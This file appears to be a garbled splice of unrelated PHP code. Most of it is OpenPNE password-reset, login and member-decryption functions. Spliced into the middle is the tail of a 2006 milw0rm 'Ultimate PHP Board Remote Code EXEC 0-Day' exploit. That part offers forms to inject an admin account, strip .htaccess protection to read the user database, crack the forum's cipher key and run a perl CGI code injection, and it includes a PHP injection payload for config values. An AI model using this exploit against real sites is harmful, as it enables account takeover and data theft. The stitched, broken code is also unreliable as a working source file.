function execute($requests)
{
//外部認証の場合はリダイレクト
check_action4pne_slave(true);
// --- リクエスト変数
$session = $requests['session'];
$id = $requests['id'];
// ----------
// ハッシュ化されたIDを戻す
$c_member_id = t_decrypt($id);
// 権限チェック
if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid')) {
handle_kengen_error();
}
if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid_time')) {
handle_kengen_error();
}
$c_member_config = db_member_c_member_config4c_member_id($c_member_id);
// 権限チェック
if ($c_member_config['password_reset_sid'] != $session) {
handle_kengen_error();
}
// 有効期限は24時間
$one_day_time = 86400;
$limit_password_reset_sid_time = $c_member_config['password_reset_sid_time'] + $one_day_time;
// 権限チェック
if (time() > $limit_password_reset_sid_time) {
$p = array('msg' => 55);
openpne_redirect('ktai', 'page_o_login', $p);
}
$this->set('session', $session);
$this->set('id', $id);
return 'success';
}
function execute($requests)
{
//外部認証の場合はリダイレクト
check_action4pne_slave(false);
// --- リクエスト変数
$session = $requests['session'];
$id = $requests['id'];
$new_password = $requests['new_password'];
$new_password2 = $requests['new_password2'];
// ----------
// ハッシュ化されたIDを戻す
$c_member_id = t_decrypt($id);
// 権限チェック
if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid')) {
handle_kengen_error();
}
if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid_time')) {
handle_kengen_error();
}
$c_member_config = db_member_c_member_config4c_member_id($c_member_id);
// 権限チェック
if ($c_member_config['password_reset_sid'] != $session) {
handle_kengen_error();
}
// 有効期限は24時間
$one_day_time = 86400;
$limit_password_reset_sid_time = $c_member_config['password_reset_sid_time'] + $one_day_time;
// 権限チェック
if (time() > $limit_password_reset_sid_time) {
$p = array('msg_code' => 'password_reset_timeout');
openpne_redirect('pc', 'page_o_tologin', $p);
}
$msg_list = array();
if (!$new_password) {
$msg_list[] = "パスワードを入力してください";
}
if (!$new_password2) {
$msg_list[] = "パスワード(確認)を入力してください";
}
if ($new_password !== $new_password2) {
$msg_list[] = "パスワードが一致しません";
}
if (!ctype_alnum($new_password) || strlen($new_password) < 6 || strlen($new_password) > 12) {
$msg_list[] = "パスワードは6~12文字の半角英数で入力してください";
}
// error
if ($msg_list) {
$p = array('msg' => array_shift($msg_list), 'session' => $session, 'id' => $id);
openpne_redirect('pc', 'page_o_password_reset', $p);
exit;
}
db_member_update_password($c_member_id, $new_password);
db_member_delete_c_member_config($c_member_id, 'password_reset_sid_time');
db_member_delete_c_member_config($c_member_id, 'password_reset_sid');
$p = array('msg_code' => 'change_password');
openpne_redirect('pc', 'page_o_tologin', $p);
}
function execute($requests)
{
if (LOGIN_URL_KTAI && !DISPLAY_LOGIN) {
client_redirect_absolute(LOGIN_URL_KTAI);
}
// --- リクエスト変数
$msg_id = $requests['msg'];
$kad = $requests['kad'];
// ----------
//メッセージ
$this->set('msg', k_p_common_msg4msg_id($msg_id));
$this->set('ktai_address', t_decrypt($kad));
$this->set('SNS_NAME', SNS_NAME);
$this->set('IS_CLOSED_SNS', IS_CLOSED_SNS);
// inc_entry_point
$this->set('inc_ktai_entry_point', fetch_inc_entry_point($this->getView(), 'ktai_o_login'));
return 'success';
}
function execute($requests)
{
//外部認証の場合はリダイレクト
check_action4pne_slave(true);
// --- リクエスト変数
$session = $requests['session'];
$id = $requests['id'];
$new_password = $requests['new_password'];
// ----------
// ハッシュ化されたIDを戻す
$c_member_id = t_decrypt($id);
// 権限チェック
if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid')) {
handle_kengen_error();
}
if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid_time')) {
handle_kengen_error();
}
$c_member_config = db_member_c_member_config4c_member_id($c_member_id);
// 権限チェック
if ($c_member_config['password_reset_sid'] != $session) {
handle_kengen_error();
}
// 有効期限は24時間
$one_day_time = 86400;
$limit_password_reset_sid_time = $c_member_config['password_reset_sid_time'] + $one_day_time;
// 権限チェック
if (time() > $limit_password_reset_sid_time) {
$p = array('msg' => 55);
openpne_redirect('ktai', 'page_o_login', $p);
}
// 新しいパスワードは有効な文字列か
if (!ctype_alnum($new_password) || strlen($new_password) < 6 || strlen($new_password) > 12) {
$p = array('msg' => 20, 'session' => $session, 'id' => $id);
openpne_redirect('ktai', 'page_o_password_reset', $p);
}
db_member_update_password($c_member_id, $new_password);
db_member_delete_c_member_config($c_member_id, 'password_reset_sid_time');
db_member_delete_c_member_config($c_member_id, 'password_reset_sid');
$p = array('msg' => 21);
openpne_redirect('ktai', 'page_o_login', $p);
}
if (isset($_REQUEST['cypher']) && isset($_REQUEST['plain'])) {
$cypher_len = strlen($_REQUEST['cypher']);
$offset = gen_offset($_REQUEST['cypher'], $_REQUEST['plain']);
print "Offset:";
for ($x = 0; $x < $cypher_len; $x++) {
print $offset[$x] . ':';
}
print '<br>';
$validKeys = 0;
$y = 0;
for ($y = 255; $y >= 0; $y--) {
$newKey[$y] = gen_collision($offset, $y);
$key_len = strlen($newKey[$y]);
print "<br>Key:{$y} = ";
for ($x = 0; $x <= $key_len; $x++) {
print $newKey[$y][$x];
}
print "<br>Cypher:" . t_encrypt($_REQUEST['plain'], $newKey[$y]);
print "<br>Plain :" . t_decrypt($_REQUEST['cypher'], $newKey[$y]) . "<br><br>";
}
exit;
}
}
}
}
}
print "<title> Ultimate PHP Board Remote Code EXEC 0-Day </title>\n \n <CENTER><B><I>0-day</I></B></CENTER>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Get Admin</I></B><br>\n <B>Inject an administrative account into UPB:</B>\n <p>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Path to attack:<i>(example: http://www.domain.ext/PathToUPB)</i><br>\n <input name=\"addVict\" type=\"text\" size=60> <br>\n Inject Name:<br>\n <input name=\"addName\" type=\"text\" size=60> <br>\n Inject Password:<br>\n <input name=\"addPass\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Inject Admin\"> \n </form>\n \n <p>\n <B>PHP code injection is possilbe in the admin panel without an exploit. Both admin_config.php and admin_config2.php can be used to execute PHP by tagging on: ' \";phpinfo(); \$crap=\"1 ' to any of the config values </B>( double quotes \" are only used in exploit)</B>\n <p> \n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Gain Read Access To The Database</I></B>\n\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Removes /db/.htaccess to allow access to the remote target's flat file database:<i>(example: http://www.domain.ext/PathToUPB [no trailing slash]) (user database in /db/users.dat) </i><br><br>\n <input name=\"victHTA\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Attack\">\n </form> \n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Crypto</I></B> \n\t\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Plain Text Password:<br>\n <input name=\"encrypt\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Encrypt\"> \n </form>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n Encrypted Password:<br>\n <input name=\"decrypt\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Decrypt\"> \n </form>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br> \n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Plain Text:<br>\n <input name=\"plain\" type=\"text\" size=60> <br>\n <p> \n corosponding cypher text:<br>\n <input name=\"cypher\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"crack key\"> \n </form>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Proof of Concept Only, Unstable Remote Code Execution Using NON-SQL Database Injection</I></B>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n perl CGI Code Injection Attack Remote Target:<br>\n <input name=\"vict\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Attack\">\n </form>\n \n <B>http://www.domain.ext/PathToUPB (no trailing slash)</B>\n </body>";
?>
# milw0rm.com [2006-06-20]
/**
* メンバーの暗号化された情報を復号化して取得
*/
function db_member_c_member_secure4c_member_id($c_member_id)
{
$sql = 'SELECT pc_address, ktai_address, regist_address, easy_access_id, hashed_password, hashed_password_query_answer FROM c_member_secure WHERE c_member_id = ?';
$c_member_secure = db_get_row($sql, array(intval($c_member_id)));
if (is_array($c_member_secure)) {
$c_member_secure['pc_address'] = t_decrypt($c_member_secure['pc_address']);
$c_member_secure['ktai_address'] = t_decrypt($c_member_secure['ktai_address']);
$c_member_secure['regist_address'] = t_decrypt($c_member_secure['regist_address']);
}
return $c_member_secure;
}
